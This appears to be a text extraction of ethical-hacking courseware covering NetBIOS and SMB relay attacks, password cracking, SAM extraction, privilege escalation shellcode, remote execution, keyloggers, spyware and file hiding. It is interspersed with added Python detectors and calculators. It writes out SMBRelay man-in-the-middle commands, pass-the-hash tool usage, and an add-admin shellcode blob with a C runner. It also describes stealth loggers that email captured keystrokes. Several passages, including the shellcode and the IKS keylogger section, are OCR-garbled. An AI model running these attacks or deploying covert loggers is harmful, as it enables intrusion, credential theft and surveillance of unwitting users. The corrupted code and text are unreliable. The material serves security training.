• NBTDeputy registers a NetBIOS computer name on the network and responds to NetBT name-query requests.

• It helps to resolve an IP address from the NetBIOS computer name, which is similar to Proxy ARP.

• This tool works well with SMBRelay.

• For example, SMBRelay runs on a computer as ANONYMOUS-ONE and the IP address is 192.168.125, and NBTDeputy is also run on 192.168.125. Then SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places."
Tool: Legion

[Screenshot: Legion v2.1 scanning the range 192.168.20.1 to 192.168.20.254 (scan type: scan range or scan list); "13 shares found on 4 remote hosts" (192.168.20.8, 192.168.20.102, 192.168.20.144, 192.168.20.170), listing SharedDocs, C, D, E, F, CD Drive and user data shares, with Show BF tool, Map Drive and Save Text buttons]

Legion automates the password guessing in NetBIOS sessions. Legion will scan multiple Class C IP address ranges for Windows shares and also offers a manual dictionary attack tool.
NetBIOS DoS Attack

• Sending a NetBIOS Name Release message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict so that the system will no longer be able to use it.

• This will block the client from participating in the NetBIOS network.

• Tool: nbname.cpp

  • NBName can disable entire LANs and prevent machines from rejoining them.

  • Nodes on a NetBIOS network infected by the tool will think that their names are already being used by other machines.
Hacking Tool: John the Ripper

• It is a command line tool designed to crack both Unix and NT passwords.

• The resulting passwords are case insensitive and may not represent the real mixed-case password.

John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer

Usage: john [OPTIONS] [PASSWORD-FILES]
-single                    "single crack" mode
-wordfile:FILE -stdin      wordlist mode, read words from FILE or stdin
-rules                     enable rules for wordlist mode
-incremental[:MODE]        incremental mode [using section MODE]
-external:MODE             external mode or word filter
-stdout[:LENGTH]           no cracking, just write words to stdout
-restore[:FILE]            restore an interrupted session [from FILE]
-session:FILE              set session file name to FILE
-status[:FILE]             print status of a session [from FILE]
-makechars:FILE            make a charset, FILE will be overwritten
-show                      show cracked passwords
-test                      perform a benchmark
-users:[-]LOGIN|UID[,..]   load this (these) user(s) only
-groups:[-]GID[,..]        load users of this (these) group(s) only
-shells:[-]SHELL[,..]      load users with this (these) shell(s) only
-salts:[-]COUNT            load salts with at least COUNT passwords only
-format:NAME               force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL             enable memory saving, at LEVEL 1..3
Password Sniffing

• Password guessing is hard work.

• Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?

• If an attacker is able to eavesdrop on NT/2000 logins, then this approach can spare a lot of random guesswork.
Sniffing Hashes Using L0phtCrack

[Screenshot: LC "SMB Packet Capture Output" window with columns Source, Destination, Username, Challenge, LanMan Hash and NT Hash, showing captured Administrator logons between 10.0.0.25 and 10.0.0.91; Save Capture and Clear Capture buttons]
Tool: ScoopLM

[Screenshot: ScoopLM window with a Start button and the columns Server, Client, Account, Result, Challenge and LM response]

• This tool captures LM/NTLM authentication exchanges on the network.

• Supports microsoft-ds, Active Directory, NTLMv2 on NetBIOS over TCP/IP, Telnet, IIS (HTTP), and DCOM over TCP/IP.
• SMBRelay is essentially an SMB server that can capture user names and password hashes from incoming SMB traffic.

• It can also perform man-in-the-middle (MITM) attacks.

• To prevent it, NetBIOS over TCP/IP should be disabled and ports 139 and 445 should be blocked.

• Start the SMBRelay server and listen for SMB packets:

  • c:\>smbrelay /E

  • (Identify the adapter index)

  • c:\>smbrelay /IL <adapter index> /IR <adapter index> /L+ <spoofed IP>

  • An attacker can access the client machine by simply connecting to it via the relay address using: c:\>net use * \\<spoofed IP>\c$

Note: This tool only works on NT 4/Windows 2000.

Proof of concept
SMBRelay Man-in-the-Middle Scenario

[Diagram: Victim client 192.168.234.220; Attacker 192.168.234.50; Man-in-the-middle 192.168.234.251 with relay address 192.168.234.252; Victim server 192.168.234.34 holding HR data]

The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, and a target server address of 192.168.234.34 with /T:

c:\>smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34

When a victim client connects to the fraudulent server thinking it is talking to the target, the MITM server intercepts the call, hashes the password, and passes the connection to the target server.
Redirecting SMB Logon to the Attacker

Eavesdropping on LM responses becomes much easier if the attacker can trick the victim into attempting Windows authentication of the attacker's choice.

The basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.

When the hyperlink is clicked, the user unwittingly sends his credentials over the network.

The attacker cracks the hashes using L0phtcrack.

[Diagram: an e-mail beginning "Hi John," carries the link; when John clicks it, John's hash, dfsd7Ecvkxjcx77868cx6vxcv, is transmitted over the network to the attacker]
SMB Replay Attacks

• Trick client computer to request a connection

• Request connection to the client computer and collect challenge

• Return challenge from client computer as own challenge

• Wait for response from the client computer

• Return response as own response

• Best way of fighting SMB replay attack is by enabling SMB signing in security policy
SMB Replay Attacks

[Diagram: message exchange between the client and the attacker]

1. I want to connect.
2. What a coincidence, so do I.
3. OK, here is a challenge.
4. Thanks! Here's your challenge, right back at you.
5. All right, here's my response to your (my) challenge.
6. That's so nice, here's your response back to you.
Replay Attack Tool: SMBProxy

• A "passing the hash" tool that works as a proxy.

• You can authenticate to a Windows NT4/2000 server by only knowing the md4 hash.

• You can mount shares and access the registry and anything a particular user can do with his privileges.

• It does not work with syskey-enabled systems.

SMBproxy V1.0.0 patrik.karlsson@ixsecurity.com

smbproxy [options]

-s* <serverip> to proxy to
-l  <listenip> to listen to
-p  <port> to listen to (139/445)
-f* <pwdumpfile> containing hashes
-v  be verbose
-h  you're reading it
Hacking Tool: SMBGrind

[Screenshot: SMB Grinder (Untitled.lc) listing Username, NT Hash, LanMan Hash and Challenge columns for the accounts Administrator, BillG, toura, fredc, threea and twoa; "Duplicate Entries Removed: 0"]

SMBGrind increases the speed of L0phtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.
Hacking Tool: SMBDie

[Screenshot: SMBdie v0.1]

What is SMBdie?
It's a proof of concept tool. It is possible to crash Windows computers by sending a specially crafted SMB request.

What computers are vulnerable?
Windows NT/2k/XP/.NET RC1 with NETBIOS enabled.

Author
zamolx3@personal.ro

Call to arms - Information anarchy
http://www.nmrc.org/InfoAnarchy/InfoAnarchy.htm

Computer (IP address): 192.168.20.109
NETBIOS name: MAHYCO-SERVER

Status:
Connecting to remote computer ... (port 139)
Connected.
Session established.
Protocol negotiated.
NULL session established.
Operating System : Windows 2000
Connected to IPC$.
Sending exploit ...
Done.

The SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially crafted SMB requests.

Proof of concept
SMB Relay Weakness & Countermeasures

Weaknesses

• The problem is to convince a victim's client to authenticate to the MITM server.

• A malicious email message to the victim client, with an embedded hyperlink to the SMBRelay server's IP address, can be sent.

• Another solution is an ARP poisoning attack against the entire segment, causing all of the systems on the segment to authenticate through the fraudulent MITM server.

Countermeasures

• Configure Windows 2000 to use SMB signing.

• Client and server communication will then cryptographically sign each block of SMB communications.

• These settings are found under Security Policies / Security Options.
Password Cracking Countermeasures

• Enforce 8-12 character alphanumeric passwords.

• Set the password change policy to 30 days.

• Physically isolate and protect the server.

• Use the SYSKEY utility to store hashes on disk.

• Monitor the server logs for brute force attacks on user accounts.
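One way to act on the last countermeasure, as an added Python example (not from the courseware): a sliding-window detector over logon-event lines that flags a source exceeding a failure threshold and separates single-account guessing from spraying across many accounts. The line format, the thresholds and every sample line are assumptions constructed for the example.

```python
# Added example, not part of the courseware: the "monitor the server logs for
# brute force attacks" countermeasure as a small detector over logon events.
# The log line format and every sample line below are constructed for the
# example; map your own audit-log export (failed-logon events) onto
# parse_line() to use it.
from __future__ import annotations

import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<event>LOGON_(?:SUCCESS|FAILURE)) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_line(line: str) -> dict | None:
    """Parse one constructed-format log line; None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
            "event": m["event"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, window_seconds: int = 60, max_failures: int = 5) -> list[dict]:
    """Raise one alert per source address that exceeds max_failures failed
    logons inside a sliding window of window_seconds. Many failures against
    one account are classified as password guessing; the same number spread
    over several accounts as spraying. Lines must be in time order."""
    recent: dict[str, deque] = defaultdict(deque)   # src -> (ts, user) failures in window
    alerted: set[str] = set()
    alerts: list[dict] = []
    for raw in lines:
        rec = parse_line(raw)
        if rec is None or rec["event"] != "LOGON_FAILURE":
            continue
        q = recent[rec["src"]]
        q.append((rec["ts"], rec["user"]))
        while (rec["ts"] - q[0][0]).total_seconds() > window_seconds:
            q.popleft()                    # drop failures older than the window
        if len(q) > max_failures and rec["src"] not in alerted:
            alerted.add(rec["src"])
            users = sorted({u for _, u in q})
            alerts.append({"src": rec["src"], "first": q[0][0], "last": rec["ts"],
                           "count": len(q), "users": users,
                           "kind": "spraying" if len(users) > 1 else "guessing"})
    return alerts


# Constructed sample: a burst against Administrator, a slow trickle that stays
# under the threshold, a spray across six accounts, and one line in another format.
SAMPLE_LOG = """\
2005-04-28 08:00:00 LOGON_FAILURE user=Administrator src=10.0.0.91
2005-04-28 08:00:04 LOGON_FAILURE user=Administrator src=10.0.0.91
2005-04-28 08:00:09 LOGON_FAILURE user=Administrator src=10.0.0.91
2005-04-28 08:00:15 LOGON_FAILURE user=Administrator src=10.0.0.91
2005-04-28 08:00:21 LOGON_SUCCESS user=rcheyne src=10.0.0.31
2005-04-28 08:00:28 LOGON_FAILURE user=Administrator src=10.0.0.91
2005-04-28 08:00:33 LOGON_FAILURE user=Administrator src=10.0.0.91
2005-04-28 08:05:00 LOGON_FAILURE user=mgavin src=10.0.0.25
2005-04-28 08:09:00 LOGON_FAILURE user=mgavin src=10.0.0.25
2005-04-28 08:14:00 LOGON_FAILURE user=mgavin src=10.0.0.25
2005-04-28 08:20:00 LOGON_FAILURE user=aschmidt src=10.0.0.77
2005-04-28 08:20:02 LOGON_FAILURE user=cwysopal src=10.0.0.77
2005-04-28 08:20:04 LOGON_FAILURE user=mgavin src=10.0.0.77
2005-04-28 08:20:06 LOGON_FAILURE user=rcheyne src=10.0.0.77
2005-04-28 08:20:08 LOGON_FAILURE user=Guest src=10.0.0.77
2005-04-28 08:20:10 LOGON_FAILURE user=Administrator src=10.0.0.77
Apr 28 08:21:00 sshd[123]: this line is in a different format and is skipped
"""

if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{a['kind']:8} from {a['src']}: {a['count']} failures "
              f"{a['first']:%H:%M:%S}-{a['last']:%H:%M:%S} on {', '.join(a['users'])}")
```

The trickle from 10.0.0.25 never exceeds the window threshold, which is the trade-off to tune against the lockout policy: a low threshold catches slow guessing but also turns a lockout policy into the NetBIOS-style denial of service described later.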
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Password Brute Force Estimate Tool 





Use to estimate time for the more difficult brute force only (dictionary lookup attacks, which are usually tried first, take seconds and get an average of 25% of all passwords).

Keyspace of the password, broken down by character class (see the "how to use this calculator" tab):

Character class                             Set size    Keyspace contribution
Upper case letters                          26          676
Lower case letters                          26          676
Numbers                                     10          10
Special characters                          32          1
or purely random combo of alpha/numeric     62          1
or random combo of alpha/numeric/special    94          1
Subject to a dictionary attack              5           1

Password length in characters

Total: 4,569,760, or 4 million combinations!

(Each contribution is the set size raised to the number of positions drawn from that class: 676 = 26^2 for two upper-case and two lower-case positions, 10 for one digit, and 1 for a class with no positions. The product 676 x 676 x 10 = 4,569,760 is the total shown.)
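The arithmetic behind this calculator, as an added Python example that is not part of the courseware: it computes the keyspace of a password whose composition is fixed (so many upper-case, lower-case and digit positions), compares it with a uniformly random password of the same length, and converts a keyspace into a brute-force time at an assumed guess rate. The character-set sizes are those of the table; the one-million-guesses-per-second rate and the duration formatting are constructed assumptions, not figures from the page.

```python
"""Password keyspace and brute-force time estimator.

Added example, not part of the courseware. Character-set sizes follow the
calculator table on the page; the guess rate is a constructed assumption
that must be replaced with a measured figure for the hash type in use.
"""

# Size of each character class (from the table on the page).
CHARSETS = {"upper": 26, "lower": 26, "digit": 10, "special": 32}


def keyspace_by_composition(composition):
    """Keyspace when the number of positions per class is known.

    composition maps class name -> number of positions, e.g.
    {"upper": 2, "lower": 2, "digit": 1}. A known composition (what a rigid
    policy or a predictable user produces) shrinks the search to
    26**2 * 26**2 * 10 = 4,569,760, the figure shown on the page.
    """
    total = 1
    for cls, positions in composition.items():
        total *= CHARSETS[cls] ** positions
    return total


def keyspace_random(alphabet_size, length):
    """Keyspace for a uniformly random password over a fixed alphabet."""
    return alphabet_size ** length


def brute_force_seconds(space, guesses_per_second, average=True):
    """Time to search a keyspace; on average half of it must be tried."""
    tried = space / 2 if average else space
    return tried / guesses_per_second


def describe(seconds):
    """Human-readable duration in the largest unit that fits."""
    units = [("years", 365 * 86400), ("days", 86400), ("hours", 3600),
             ("minutes", 60), ("seconds", 1)]
    for name, size in units:
        if seconds >= size:
            return f"{seconds / size:,.1f} {name}"
    return f"{seconds:.3f} seconds"


def compare(length, composition, guesses_per_second):
    """Keyspace and average crack time for the known composition versus
    random passwords of the same length over the 62- and 94-symbol sets."""
    spaces = {
        "known composition": keyspace_by_composition(composition),
        "random alphanumeric (62)": keyspace_random(62, length),
        "random alphanumeric+special (94)": keyspace_random(94, length),
    }
    return {name: (space, brute_force_seconds(space, guesses_per_second))
            for name, space in spaces.items()}


if __name__ == "__main__":
    RATE = 1_000_000  # constructed guess rate (guesses per second)
    results = compare(5, {"upper": 2, "lower": 2, "digit": 1}, RATE)
    for name, (space, secs) in results.items():
        print(f"{name:35s} {space:>20,d} combinations  ~{describe(secs)}")
```

The comparison is the point for a policy author: dictating where the digit goes (or letting users put it at the end, as they do) collapses 62^5 = 916,132,832 candidates to 4,569,760, and a 30-day rotation does nothing against a search that finishes in seconds.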
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Syskey utility 



(Screenshot: Windows Explorer beside the Syskey "Securing the Windows Account Database" dialog with the System Generated Password option selected.)
© The key used to encrypt the passwords is randomly generated by the 
Syskey utility 

© Encryption prevents compromise of the passwords 

© Syskey uses 128-bit encryption to encrypt the system hash 

© Syskey must be present for the system to boot 
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Scenario 



David scanned the University LAN and found that most of the ports for services that were not needed were disabled. David found it difficult to run the password crackers, as his boss sits next to him. It upset him, as the exam dates were approaching and he had already accepted the money.

What do you think David would try next?
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System Hacking: Part II

Escalating Privileges

CEH Hacking Cycle

Cracking passwords

Escalating privileges
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Privilege Escalation 



© If an attacker gains access to the network using a non-admin user account, the next step is to gain higher privilege, to that of an administrator.

© This is called privilege escalation.

"I can access the network using John's user account, but I need Admin privileges."
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Cracking NT/ 2000 passwords 



© The SAM file in Windows NT/2000 contains the user names and encrypted passwords. The SAM file is located in the %systemroot%\system32\config directory.

© The file is locked when the OS is running.

• Booting to an alternate OS.

- NTFSDOS (www.sysinternals.com) will mount any NTFS partition as a logical drive.

• Backup SAM from the Repair directory.

- Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._ sam

• Extract the hashes from the SAM.

- Use L0phtcrack to crack the password hashes.
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Change Recovery Console Password - Method 1

In the case of Windows 2000 machines:

© You can use the setpwd.exe utility to change the SAM-based administrator password.

© Change to the %SystemRoot%\System32 folder.

© To change the local SAM-based Administrator password, type setpwd and then press ENTER.

© To change the SAM-based Administrator password on a remote domain controller:

• Type setpwd /s:servername and then press ENTER, where servername is the name of the remote domain controller.

© When you are prompted to type the password for the Directory Service Restore Mode Administrator account, type the new password that you want to use.
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Change Recovery Console Password - Method 2

1. Shut down the domain controller on which you want to change the password.

2. Restart the computer:

• The selection menu screen is displayed during the restart process.

• Press F8 to view advanced startup options.

3. Select the Directory Service Restore Mode option.

4. After you successfully log on, use one of the following methods to change the local Administrator password:

• At a command prompt, type the following command: net user administrator * (or)

• Use the Local Users and Groups snap-in (Lusrmgr.msc) to change the Administrator password.

5. Shut down and restart the computer.
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Change Recovery Console Password - Method 3

© Assists in easily changing passwords

© Can also change the local administrator's password

© Utilizes the administrator account to log on to the Recovery Console or Directory Services

© Syntax: net user administrator <password>
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Privilege Escalation Tool: x.exe

© This tool, when executed on the local machine, will create user X with password X and make the X user a member of the administrators group.

© This technique is widely used in buffer overflow exploits.



char code[] = 

"\x66\x81\xec\x8o\xoo\xB9\xe6\xe0\xba\xoo\xoo\xoo\x89\xo6\xff\x36" 

"\x68\x8e\x4e\xoe\xec\xe8\xc1\xoo\xoo\xoo\xB9\x46\xoB\x31\xco\x50" 

"\x68\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\x56\x08\x89\x46" 

"\xo4\xff\x36\x68\x7e\xd8\xe2\x73\xe8\x9e\xoo\xoo\xoo\x89\x46\xoc" 

"\xff\x76\xo4\x68\x5e\xdf\x7c\xcd\xe8\x8e\xoo\xoo\xoo\xB9\x46\x10" 

"\xff\x76\xo4\x68\xd7\x3d\xoc\xc3\xe8\x7e\xoo\xoo\xoo\x89\x46\x14" 

"\x31\xco\x31\xdb\x43\x50\x68\x72\xoo\x73\xoo\x68\x74\xoo\x6f\xoo" 

"\x68\x72\xoo\x61\xoo\x68\x73\xoo\x74\xoo\x68\x6e\xoo\x69\xoo\x68" 

"\x6d\xoo\x69\xoo\x68\x41\xoo\x64\xoo\x89\x66\x1c\x50\x68\x58\xoo" 

"\xoo\xoo\x89\xe1\x89\x4e\x18\x68\xoo\xoo\x5c\xoo\x50\x53\x50\x50" 

"\^53\^5'^\^5i\^5i\^B9Wi\x5o\x54\x5i\x53\x5o\xff\x56\xio\x8b\x4e" 

"\x18\x49\x49\x51\x89\xe1\x6a\xo1\x51\x6a\xo3\xff\x76\x1c\x6a\xoo" 

"\xff\x56\x14\xff\x56\xoc\x56\x64\xa1\x30\xoo\xoo\xoo\x8b\x40\xoc" 

"\x8b\x70\x1c\xad\x8b\x40\xo8\x5e\xc2\xo4\xoo\x53\x55\x56\x57\x8b" 

"\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b" 

"\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31" 

" \xc o \xac \x 3 8 \xe o \x 7 4 \x o 7 \xc 1 \xcf\x od \x o 1 \xc 7 \xeb \xf 2 \x 3b \x 7c \x 2 4" 

"\x14\x75\xe1\x8b\x5a\x24\xoi\xeb\x66\x8b\xoc\x4b\x8b\x5a\x1c\xo1" 

"\xeb\x8b\xo4\x8b\xo1\xe8\xeb\xo2\x3i\xco\x89\xea\x5f\x5e\x5d\x5b" 

"\xc2\xo4\xoo"; 



int main(int argc, char **argv)
{
    /* Cast the byte array to a function pointer and call it. */
    int (*funct)();
    funct = (int (*)()) code;
    (int)(*funct)();
}



System Hacking: Part III

Executing applications

CEH Hacking Cycle

Cracking passwords

Escalating privileges

Executing applications
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Tool : psexec 



© Lets you execute processes on other systems remotely.
© Launches interactive command prompts on remote systems.

C:\CEH\Raja\Tools\mahendran\Tools\psexec>psexec

PsExec v1.41 - execute processes remotely
Copyright (C) 2001-2003 Mark Russinovich
www.sysinternals.com

PsExec executes a program on a remote system, where remotely executed console
applications execute interactively.

Usage: psexec [\\computer] [-u user [-p psswd]] [-s|-e] [-i] [-c [-f|-v]] [-d] [-<priority>] [-a n,n,...] cmd [arguments]
    computer    Direct PsExec to run the application on the remote
                computer. If you omit the computer name PsExec runs
                the application on the local system.
    -u          Specifies optional user name for login to remote
                computer.
    -p          Specifies optional password for user name. If you omit this
                you will be prompted to enter a hidden password.
    -s          Run the remote process in the System account.
    -e          Loads the specified account's profile.
    -i          Run the program so that it interacts with the desktop on the
                remote system.
    -c          Copy the specified program to the remote system for
                execution. If you omit this option the application
                must be in the system path on the remote system.
    -f          Copy the specified program even if the file already
                exists on the remote system.
    -v          Copy the specified file only if it has a higher version number
                or is newer on than the one on the remote system.
    -d          Don't wait for process to terminate (non-interactive).
    -priority   Specifies -low, -belownormal, -abovenormal, -high or
                -realtime to run the process at a different priority.
    -a          Separate processors on which the application can run with
                commas where 1 is the lowest numbered CPU. For example,
                to run the application on CPU 2 and CPU 4, enter:
                "-a 2,4"
    program     Name of application to execute.
    arguments   Arguments to pass (note that file paths must be
                absolute paths on the target system).
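A defender's view of the same tool, as an added Python example that is not from the courseware or from Sysinternals: PsExec copies its service binary PSEXESVC.exe to the target and registers it as a service named PSEXESVC, which the Service Control Manager logs as event ID 7045 ("A service was installed in the system"). The script parses a constructed, simplified one-line-per-event export of the System log and flags those installs. The export layout, the timestamps and the other service names are assumptions made for the example; the event ID and the field names inside the 7045 message are real.

```python
"""Flag PsExec-style remote execution in a Windows System log export.

Added example, not part of the courseware. PsExec installs its service
binary (PSEXESVC.exe) on the target and registers it as the PSEXESVC
service, recorded by the Service Control Manager as event ID 7045. The
log lines below are constructed in a simplified one-event-per-line format;
adapt parse_event() to the export your collector actually produces.
"""
import re

# Constructed sample export of the System log on a monitored host.
SAMPLE_LOG = """\
2003-05-13 16:31:58 EventID=7036 Source="Service Control Manager" Message="The Print Spooler service entered the running state."
2003-05-13 16:32:01 EventID=7045 Source="Service Control Manager" Message="A service was installed in the system. Service Name: PSEXESVC Service File Name: %SystemRoot%\\PSEXESVC.exe Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem"
2003-05-13 16:32:02 EventID=7036 Source="Service Control Manager" Message="The PSEXESVC service entered the running state."
2003-05-13 16:40:10 EventID=7045 Source="Service Control Manager" Message="A service was installed in the system. Service Name: Backup Agent Service File Name: C:\\Program Files\\Backup\\agent.exe Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) EventID=(?P<id>\d+) Source="(?P<src>[^"]*)" Message="(?P<msg>.*)"$'
)
# Field labels as they appear in the 7045 message text.
FIELD_RE = re.compile(
    r"Service Name: (?P<name>.*?) Service File Name: (?P<file>.*?) Service Type: "
    r"(?P<type>.*?) Service Start Type: (?P<start>.*?) Service Account: (?P<account>.*)$"
)


def parse_event(line):
    """Return a dict for one export line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["id"] = int(ev["id"])
    if ev["id"] == 7045:
        f = FIELD_RE.search(ev["msg"])
        if f:
            ev.update(f.groupdict())
    return ev


def detect_psexec(log_text):
    """Return service-install events that carry PsExec's default names.

    A renamed copy evades this exact match, so all_service_installs() is
    the baseline an analyst should still review.
    """
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if not ev or ev["id"] != 7045 or "name" not in ev:
            continue
        name = ev["name"].lower()
        binary = ev["file"].lower()
        if "psexesvc" in name or binary.endswith("psexesvc.exe"):
            ev["reason"] = "PsExec default service name/binary"
            hits.append(ev)
    return hits


def all_service_installs(log_text):
    """Every 7045 event, i.e. every new service the host has seen."""
    return [ev for ev in map(parse_event, log_text.splitlines())
            if ev and ev["id"] == 7045]


if __name__ == "__main__":
    for ev in detect_psexec(SAMPLE_LOG):
        print(f"{ev['ts']}  {ev['reason']}: {ev['name']} -> {ev['file']}")
```

Pair the 7045 rule with the logon that preceded it: PsExec authenticates over SMB to the ADMIN$ share with the credentials given by -u/-p, so a service install that follows a network logon from an unexpected source host is the combination worth alerting on.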
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Tool: remoexec 



(Screenshot: RemoExec dialog with fields Computer: 127.0.0.1, [Domain\]Account: Administrator, Password: ********, Program: E:\test, and an Execute button.)

© Executes applications remotely.
© You should know the following: the IP address, the account name and password, and the application.
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Keystroke Loggers 



© If all other attempts to sniff out domain privileges fail, then a keystroke logger is the solution.

© Keystroke loggers are stealth software that sit between the keyboard hardware and the operating system, so that they can record every keystroke.

© There are two types of keystroke loggers:

1. Software based
2. Hardware based
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Spytech Realtime- spy 



© Records

Keystrokes
Websites visited
Internet connections
Windows opened
Chat conversations
Applications executed
System information
System shutdowns
Logged on users
Emails typed
Passwords typed

(Screenshot: Realtime-Spy Console, a web interface with sections for keystroke logs, windows viewed, applications ran, websites visited, net connections, chat transcripts and documents viewed. The "Keystrokes Typed" log lists every keystroke entered by the user, with the window title, user name and timestamp.)
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I KS Software Keylogger 




Datview - Binary Log Translator for IKS 



/^IKS Tut WifiJif-ti Etna InilaUrfkm 



In a SimH) ^mt'iiU'no, no -AKJiO^ mI 1h cf Hied In ordtf it* \t» wMk&m Id h 
rrior^o(*d 

kig rJ« ki 'iy t« ii^wiMC iGi ^hiylhrf e4 ytu tHoiu, and it b«lcK jri«t ir^j 



Filters - 



p [Filter Out Arrow Keys; 

p Filter Out Ctrl and Alt Keys 

\7 Filter Out F1 to F1 2 Keys 

n Filter Out AJI Other Function Xejis 



r Viewer 

^' Use Notepad 

C Translate to Text Only 



- Clear Log 

P Clear Binary Log Upon Exit 

p Clear Text Log Upon Exjt 



Import Binary Log From: 



jcAwinntMks.dat 


Browse... | 


Save Text Log To: ^^^^^^ 


jc:\tempMks.txt 


Browse... | 








Gol 1 



plaee in ifcnleqi 



D '.WJHHTUs cW 



The ddtvnvr.QHC vnver cm fco cr^inJ Ld bic.dnn n^^jikig d Ift^i^ 4&dud^E<.. rou 
chiKSH- tn ODp)^ [jt mvf a yoti can Gip^ il Cater rTMnu!^ 



|i_.^.*''n<".n| 



http://www.amecisco.com/downloads.htm 

1 1 is a desktop activity logger that is 
powered by a kernel mode driver. This 
driver enables it to run si lently at the 
lowest level of Windows 2000/XP 
operating systenns. 
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Ghost Keylogger 



(Screenshot: Ghost Keylogger Configuration, Mail tab: log with email, encrypt the mail, default mail service, subject "Log file", send mail after every N hours/minutes, To: your_email_address. The dialog notes that default mail accounts 1-4 are primarily for testing and recommends a user-defined mail account.)

Emails are sent secretly without leaving any trace on the monitored machine.

Emails are sent on a timely basis.

To make the email system as simple as possible, Ghost Keylogger has a number of preconfigured mail services.

The only thing you have to do in order to receive the log files is to enter your email address.

http://www.keylogger.net/
It is a stealth keylogger and invisible surveillance tool that records every keystroke to an encrypted log file. The log file can be sent secretly with email to a specified address.

Before you start logging you can check that the email works by pressing the "Test" button.

Picture Source:
http://www.shareup.com/Ghost_Keylogger-screenshot-1672.html
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H acki ng Tool : H ardware Key Logger 



© The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

© It keeps a record of all keystrokes typed on the keyboard. The recording process is totally transparent to the end user.

© There are two types of hardware keyloggers:

• PS/2 keyloggers

• USB keyloggers
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H ardware Keylogger: Output 



(Screenshot: two Notepad windows showing the KeyGhost II standard device (www.keyghost.com, help@keyghost.com) typing out its own menu: 1. Entire log download, 2. Section log download, 3. Wipe log, 4. Format, 5. Options change, 8. Diagnostics, 9. exit; "Do not change window until finish. Select number." The options sub-menu offers optimize speed, password change, diagnostics and exit. The downloaded log reports "Keys so far is 640 out of 523958 ..." and replays the captured keystrokes of an email being composed, with <bks> marking each backspace, followed by the typed string eccouncilceh and the prompt "wipe log (y/n)".)
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What isSpyware? 



© Spyware is a program that records computer activities on a machine.

Records keystrokes
Records email messages
Records IM chat sessions
Records websites visited
Records applications opened
Captures screenshots
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Spyware: Spector 



© Spector is spyware that records everything that one does on the Internet.

© Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera.

© Spector works by taking a snapshot of whatever is on the computer screen and saving it away in a hidden location on the system's hard drive.

(Screenshot: Spector Toolbar Screen Shot in Microsoft Internet Explorer.)
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H acki ng Tool : eB I aster 



(Screenshot: eBlaster 3.0 Control Panel, Options > Reports: report delivery on/off; report format HTML or plain text; report sending interval every 60 minutes or once a day at a set time; send email report to a To/CC/BCC address; email identification with From "eBlaster - Johns Laptop" and Subject "eBlaster Activity Report"; inactivity timeout in minutes; delivery method via SpectorSoft server or via custom server.)

It shows what the surveillance target surfs on the Internet and records all emails, chats, instant messages, websites visited, and keystrokes typed, and automatically sends this recorded information to the desired email address.
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stealth Voice Recorder 



(Screenshot: TOBEST Stealth Recorder Options. General tab: voice activation system level, with recording starting at 45 dB and ending a set number of seconds after the level drops below the activation dB; record/playback devices; volume and mic auto gain control; a monitor button to check the mic; misc options for stealth mode, start recording at launch and hiding the about screen; a popup menu hotkey (Control/Alt/Shift plus a key). Email & FTP tab: after each recording, send the recorded file via e-mail (e-mail address and SMTP server) and/or upload to an FTP server (host, user ID, password, directory, passive transfer).)
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Stealth Keylogger

© Keystrokes recording
© Websites visited
© Chat and instant message monitoring
© Recording applications executed
© File monitoring
© Screenshot monitoring
© Printer monitoring
© Clipboard monitoring

(Screenshot: Stealth KeyLogger main window with Options (daily logs, global logs, screenshots, settings, registration), Actions (start/stop monitoring), "Application Status: Monitoring", "Current User: Mahendran", and the current day's reports: keystrokes typed, websites visited, applications run, chat monitor, file/folder monitor, clipboard monitor, screenshots and an aggregated report; plus Hide, Uninstall and Help buttons.)
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stealth Website 



© Designed to monitor and record all websites visited by a user or computer.

© Offers detailed reports on all accessed websites from a single computer or from the entire network.

© Displays reports in web format or secretly sends them to a specified email address.

© All recorded information is stored in a secret encrypted file.
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Scenario 



Every afternoon Daniel leaves for lunch before David. Though he closes all his applications, David has physical access to the system.

David installs a hardware keylogger on his boss' system and then waits for his boss to resume work.

Within a few hours, David gets the output of the keylogger containing the user name and password for accessing the Question Bank!
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System Hacking: Part IV

Hiding files

CEH Hacking Cycle

Cracking passwords

Escalating privileges

Hiding files
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Hiding Files

© There are two ways of hiding files in NT/2000.

• 1. Attrib

- Use attrib +h [file/directory]

• 2. NTFS Alternate Data Streaming

- The NTFS file system used by Windows NT, 2000, and XP has a feature, Alternate Data Streams, that allows data to be stored in hidden files that are linked to a normal visible file.

© Streams are not limited in size and there can be more than one stream linked to a normal file.
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Hacking Tool: RootKit 



© What if the very code of the operating system came under the control of the attacker?

